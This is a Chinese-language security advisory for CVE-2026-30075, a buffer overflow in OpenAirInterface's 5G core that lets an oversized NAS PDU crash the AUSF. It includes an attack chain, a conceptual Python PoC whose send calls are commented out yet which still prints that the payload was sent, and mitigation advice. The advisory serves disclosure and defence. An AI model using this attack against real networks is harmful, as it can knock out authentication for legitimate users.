CVE-2026-30075 OpenAirInterface缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-30075

漏洞类型

缓冲区溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenAirInterface

漏洞概述

OpenAirInterface 2.2.0版本在处理上行NAS传输时存在缓冲区溢出漏洞。攻击者可发送包含超大NAS PDU的认证响应，经AMF组件解码并传递至AUSF后，触发缓冲区溢出导致AUSF崩溃。此漏洞将导致用户无法注册及验证，从而造成拒绝服务。

技术细节

该漏洞源于OpenAirInterface 5G核心网组件在处理特定NAS信令消息时缺乏严格的边界长度检查。具体流程为：攻击者向网络发送特制的上行NAS传输消息，其中包含一个经过精心构造的认证响应，该响应携带了超长尺寸的NAS PDU（例如大于100字节）。当AMF（接入和移动性管理功能）接收到此消息后，执行解码操作并将其转发至AUSF（认证服务器功能）进行后续验证。由于AUSF在处理该超长数据时存在缓冲区溢出缺陷，导致程序内存越界写入，进而引发服务进程崩溃。攻击者利用此漏洞无需任何身份认证即可远程发起攻击，导致核心网组件不可用，彻底阻断合法用户的注册与验证流程，造成拒绝服务。

攻击链分析

STEP 1

步骤1：侦察

攻击者识别目标网络中的OpenAirInterface 5G核心网组件，特别是暴露的AMF或AUSF接口。

STEP 2

步骤2：构造恶意数据包

攻击者构造一个包含超大NAS PDU（超过100字节）的认证响应消息，将其封装在上行NAS传输（UplinkNASTransport）消息中。

STEP 3

步骤3：发送攻击数据

通过网络将特制的数据包发送给AMF。AMF对消息进行解码，并将NAS PDU转发给AUSF组件进行验证。

STEP 4

步骤4：触发漏洞

AUSF组件在处理超长NAS PDU时发生缓冲区溢出，导致服务进程崩溃。

STEP 5

步骤5：达成拒绝服务

AUSF崩溃导致无法处理新的认证请求，合法用户无法完成注册和验证，5G核心网服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept for CVE-2026-30075
# This script demonstrates how to send a crafted NAS PDU to trigger the buffer overflow.
# Note: This is a conceptual demonstration and requires a 5G stack library to construct valid NAS messages.

import socket

# Target AUSF component (or AMF which forwards to AUSF)
# In a real scenario, this would be the AMF IP/Port listening for N1/N2 traffic.
TARGET_IP = "192.168.1.100"
TARGET_PORT = 38412 # Example SCTP port for NGAP

# Construct a malicious payload
# A normal Authentication Response is much smaller.
# We send a large buffer (e.g., 100 bytes or more) to overflow the reading buffer in AUSF.
malicious_payload = b"\x00" * 200  # 200 bytes of null bytes

# In a real 5G attack, this would be wrapped in a NAS Authentication Response message
# inside a Uplink NAS Transport container sent via NGAP.
# For demonstration purposes, we simulate sending the raw oversized data.

def send_exploit():
    try:
        # Create a socket (SCTP is typically used for NGAP, but TCP shown for simplicity)
        # In practice, tools like Scapy with SCTP support or specific 5G test tools (e.g., srsRAN) are used.
        print(f"[*] Sending malicious payload to {TARGET_IP}:{TARGET_PORT}")
        # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # sock.connect((TARGET_IP, TARGET_PORT))
        # sock.send(malicious_payload)
        # sock.close()
        print("[+] Payload sent. If vulnerable, AUSF should crash.")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    send_exploit()

影响范围

OpenAirInterface 2.2.0

防御指南

临时缓解措施

建议立即检查OpenAirInterface版本，并关注官方发布的修复补丁。在升级前，可通过配置网络访问控制列表（ACL）限制对核心网接口的访问，并利用入侵检测系统（IDS）监控是否存在异常的大流量NAS消息传输，以降低被攻击风险。